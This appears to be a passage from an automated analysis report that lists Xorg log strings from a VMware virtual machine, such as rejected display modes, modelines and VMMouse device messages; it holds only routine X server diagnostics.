    Source: Xorg.0.log.152.drBinary or memory string: [ 590.250] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.717] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.271] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.795] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.994] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.896] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 596.836] (II) vmware(0): Initialized VMware Xinerama extension.
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.849] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.082] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.174] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.694] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.028] (II) vmware(0): Not using default mode "640x400" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.696] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.735] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.343] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.850] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.257] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.552] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.261] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.291] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.617] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.895] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.268] (**) vmware(0): Default mode "800x600": 56.3 MHz, 53.7 kHz, 85.1 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.677] (II) vmware(0): Modeline "1152x864"x85.0 119.65 1152 1224 1352 1552 864 865 868 907 -hsync +vsync (77.1 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.224] (II) vmware(0): Not using default mode "320x175" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.071] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.906] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.528] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.371] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.542] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.999] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.901] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.635] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.956] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.086] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.064] (II) vmware(0): Not using default mode "1440x810" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.351] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.535] (--) vmware(0): bpp: 32
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.200] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.755] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.698] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.454] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.294] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.685] (**) vmware(0): Default mode "1152x864": 108.0 MHz, 67.5 kHz, 75.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.431] (II) vmware(0): Not using default mode "1440x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.649] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.414] (WW) vmware(0): Disabling Render Acceleration.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.230] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.503] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 593.042] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.617] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.453] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.254] (**) vmware(0): Default mode "1152x864": 96.8 MHz, 63.0 kHz, 70.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.860] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.774] (==) vmware(0): Silken mouse enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.076] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.067] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.551] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.589] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.099] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.056] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.196] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.492] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.771] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.271] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.222] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.456] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.171] (--) vmware(0): w.blu: 8
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.104] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.598] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.337] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.574] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.843] (==) vmware(0): Backing store enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.610] (II) vmware(0): Initialized VMWARE_CTRL extension version 0.2
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.607] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.507] (--) vmware(0): mheig: 885
    Source: Xorg.0.log.152.drBinary or memory string: [ 583.097] (II) LoadModule: "vmware"
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.626] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.772] (II) Loading /usr/lib/xorg/modules/drivers/vmware_drv.so
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.526] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.236] (II) vmware(0): Modeline "640x480"x85.0 36.00 640 696 752 832 480 481 484 509 -hsync -vsync (43.3 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.912] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.876] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.769] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.965] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.762] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.946] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.177] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.463] (--) vmware(0): bpp: 32
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.871] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.795] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.139] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.544] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse1)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.248] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.610] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.683] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.303] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.821] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.252] (**) vmware(0): Default mode "640x480": 25.2 MHz, 31.5 kHz, 59.9 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.177] (--) vmware(0): vis: 4
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.215] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.297] (**) vmware(0): Default mode "640x360": 17.8 MHz, 22.2 kHz, 59.3 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.622] (II) vmware(0): Initialized VMware Xinerama extension.
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.594] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.799] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.445] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.776] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.270] (**) vmware(0): Default mode "720x400": 35.5 MHz, 37.9 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.696] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.735] (==) vmware(0): Using HW cursor
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.780] (II) vmware(0): Initialized VMware Xv extension successfully.
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.730] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.148] (--) vmware(0): depth: 24
    Source: Xorg.0.log.152.drBinary or memory string: [ 605.055] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.285] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 544.397] (WW) vmware(0): Disabling 3D support.
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.584] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.741] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.626] (II) vmware(0): vgaHWGetIOBase: hwp->IOBase is 0x03d0
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.924] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.425] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.276] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.278] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.466] (II) vmware: driver for VMware SVGA: vmware0405, vmware0710
    Source: Xorg.0.log.152.drBinary or memory string: [ 586.553] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.567] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.988] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.773] (II) vmware(0): Not using default mode "864x486" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.314] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.163] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.125] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.501] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.784] (EE) vmware(0): Failed to open drm.
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.204] (II) vmware(0): Modeline "1024x768"x85.0 94.50 1024 1072 1168 1376 768 769 772 808 +hsync +vsync (68.7 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.206] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.888] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.195] (II) vmware(0): Modeline "1152x864"x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.002] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.654] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.552] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.797] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.779] (**) vmware(0): Default mode "1024x768": 78.8 MHz, 60.0 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 603.710] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.591] (--) vmware(0): mwidt: 1176
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.580] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.651] (II) vmware(0): Not using default mode "864x486" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.226] (**) vmware(0): Default mode "864x486": 32.5 MHz, 30.3 kHz, 59.9 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 585.026] (II) vmware: driver for VMware SVGA: vmware0405, vmware0710
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.689] (II) vmware(0): Not using default mode "1024x576" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.394] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.728] (II) vmware(0): Not using default mode "1368x768" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.116] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.297] (II) vmware(0): Modeline "800x600"x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.452] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse0)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.895] (**) vmware(0): Default mode "1024x768": 75.0 MHz, 56.5 kHz, 70.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.355] (II) vmware(0): Not using default mode "680x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.388] (II) vmware(0): Not using default mode "1440x900" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.314] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.280] (II) vmware(0): Modeline "800x600"x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync (46.9 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.900] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.269] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.806] (II) vmware(0): Not using default mode "1024x576" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.293] (II) vmware(0): Modeline "640x360"x59.8 18.00 640 664 720 800 360 363 368 376 -hsync +vsync (22.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.643] (==) vmware(0): Using HW cursor
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.043] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.279] (**) vmware(0): Default mode "640x400": 31.5 MHz, 37.9 kHz, 85.1 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.058] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.091] (II) vmware(0): Not using default mode "2560x1600" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.600] (**) vmware(0): *Driver mode "vmwlegacy-default-800x600": 36.3 MHz, 36.2 kHz, 60.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.017] (II) vmware(0): Not using default mode "640x480" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.892] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 457.318] (II) Module vmware: vendor="X.Org Foundation"
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.641] (II) vmware(0): Modeline "640x350"x85.1 31.50 640 672 736 832 350 382 385 445 +hsync -vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.488] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.106] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.916] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.832] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.262] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.763] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.142] (**) vmware(0): Default mode "640x480": 36.0 MHz, 43.3 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.164] (**) vmware(0): Default mode "1152x864": 108.0 MHz, 67.5 kHz, 75.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.316] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.333] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.921] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.691] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.239] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.194] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.182] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.641] (II) vmware(0): Not using default mode "360x202" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.624] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.583] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.633] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.433] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.203] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.079] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.638] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.907] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.235] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.806] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse0)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.030] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.938] (**) vmware(0): Default mode "800x600": 50.0 MHz, 48.1 kHz, 72.2 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.777] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.784] (II) vmware(0): Not using default mode "320x175" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.628] (II) vmware(0): Not using default mode "320x180" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.688] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.173] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.780] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
    Source: Xorg.0.log.152.drBinary or memory string: [ 593.311] (II) vmware(0): Modeline "800x600"x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync (35.2 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.305] (II) vmware(0): Modeline "800x600"x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync (35.2 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 558.767] (II) vmware(0): Terminating Xv video-stream id:0
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.516] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.518] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.063] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.771] (II) vmware(0): Modeline "1024x768"x85.0 94.50 1024 1072 1168 1376 768 769 772 808 +hsync +vsync (68.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.258] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.5 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.375] (**) vmware(0): Default mode "720x400": 35.5 MHz, 37.9 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.949] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.906] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
